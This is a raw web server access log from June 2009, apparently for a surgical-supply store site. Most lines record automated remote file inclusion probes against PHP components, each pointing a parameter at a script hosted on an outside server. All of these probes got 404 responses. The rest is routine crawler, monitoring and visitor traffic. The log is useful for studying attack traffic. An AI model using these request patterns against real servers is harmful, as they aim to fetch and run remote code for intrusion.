213.17.151.30 - - [28/Jun/2009:08:52:14 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 279 "-" "libwww-perl/5.822"
213.17.151.30 - - [28/Jun/2009:08:52:14 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 252 "-" "libwww-perl/5.822"
213.17.151.30 - - [28/Jun/2009:08:52:14 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 257 "-" "libwww-perl/5.822"
124.0.103.194 - - [28/Jun/2009:08:52:20 -0400] "GET /logs/access_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
38.117.93.134 - - [28/Jun/2009:08:52:21 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:52:21 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:52:21 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
213.17.151.30 - - [28/Jun/2009:08:52:22 -0400] "GET /logs/access_log.Q109061600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 279 "-" "libwww-perl/5.822"
38.103.48.109 - - [28/Jun/2009:08:52:38 -0400] "GET /logs/access_log.Q109051000//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:52:43 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
209.59.12.99 - - [28/Jun/2009:08:52:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [28/Jun/2009:08:53:03 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:53:13 -0400] "GET /logs/access_log.Q109061700%20%20/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:53:25 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:53:25 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:53:26 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:53:26 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.103.48.109 - - [28/Jun/2009:08:53:48 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:53:48 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:53:48 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
217.147.29.190 - - [28/Jun/2009:08:54:05 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:54:05 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:54:05 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:54:23 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:08:55:58 -0400] "GET /index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:08:55:58 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:08:55:58 -0400] "GET /logs/index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:08:56:07 -0400] "GET /logs/access_log.Q109061900%20%20/index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
38.117.93.134 - - [28/Jun/2009:08:56:27 -0400] "GET /logs/access_log.Q109051600%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:56:27 -0400] "GET /logs/access_log.Q109052700%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
217.147.29.190 - - [28/Jun/2009:08:56:59 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:57:07 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:57:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [28/Jun/2009:08:58:09 -0400] "GET /logs/access_log.Q108081100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.232.68.137 - - [28/Jun/2009:08:58:20 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.232.68.137 - - [28/Jun/2009:08:58:20 -0400] "GET /logs/access_log.Q109061900/index.php?redir=http://trac.1durch0.de/trac/raw-attachment/ticket/52/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
12.11.10.200 - - [28/Jun/2009:08:59:50 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
209.172.33.230 - - [28/Jun/2009:09:00:00 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.172.33.230 - - [28/Jun/2009:09:00:00 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.172.33.230 - - [28/Jun/2009:09:00:00 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:09:00:43 -0400] "GET /logs/error_log.Q109060300%20/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [28/Jun/2009:09:00:43 -0400] "GET /logs/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
216.17.99.13 - - [28/Jun/2009:09:00:43 -0400] "GET /logs/error_log.Q109051900%20/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [28/Jun/2009:09:00:43 -0400] "GET /errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
193.243.139.4 - - [28/Jun/2009:09:02:55 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:09:02:55 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:09:02:55 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [28/Jun/2009:09:03:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [28/Jun/2009:09:03:20 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
83.13.191.186 - - [28/Jun/2009:09:03:25 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:09:03:25 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:09:03:25 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
194.201.253.2 - - [28/Jun/2009:09:03:27 -0400] "GET /logs/appserv/main.php?appserv_root=? HTTP/1.1" 404 219 "-" "Mozilla/3.0 (OS/2; U)"
194.201.253.2 - - [28/Jun/2009:09:03:27 -0400] "GET /appserv/main.php?appserv_root=? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
194.201.253.2 - - [28/Jun/2009:09:03:29 -0400] "GET /appserv/main.php?appserv_root=http://www.festasapeca.com.br/bo.do?? HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
194.201.253.2 - - [28/Jun/2009:09:03:29 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.festasapeca.com.br/bo.do?? HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
83.13.191.186 - - [28/Jun/2009:09:03:36 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:09:03:36 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:09:03:36 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:03:53 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:03:53 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:03:53 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:09:03:55 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
83.13.191.186 - - [28/Jun/2009:09:04:02 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:04:17 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:04:17 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:04:17 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:04:17 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:04:22 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.34.167.192 - - [28/Jun/2009:09:04:22 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.34.167.192 - - [28/Jun/2009:09:04:22 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.34.167.192 - - [28/Jun/2009:09:04:24 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
193.34.167.192 - - [28/Jun/2009:09:04:24 -0400] "GET /logs/access_log.Q109061600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.172.33.230 - - [28/Jun/2009:09:04:26 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.172.33.230 - - [28/Jun/2009:09:04:33 -0400] "GET /logs/error_log.Q109053100//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:04:42 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:05:01 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.243.139.4 - - [28/Jun/2009:09:05:01 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.243.139.4 - - [28/Jun/2009:09:05:01 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.13.191.186 - - [28/Jun/2009:09:05:07 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:09:05:29 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:09:05:29 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:09:05:29 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:06:01 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:06:01 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:06:01 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:09:06:33 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:09:06:38 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
209.59.12.99 - - [28/Jun/2009:09:08:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.179 - - [28/Jun/2009:09:08:19 -0400] "GET /logs/access_log.Q109052900 HTTP/1.0" 200 4356729 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.189.18.73 - - [28/Jun/2009:09:09:04 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:09:09:04 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.246.39.116 - - [28/Jun/2009:09:09:51 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "http://www.acesurgical.com/trufix.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:53 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
87.246.39.116 - - [28/Jun/2009:09:09:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
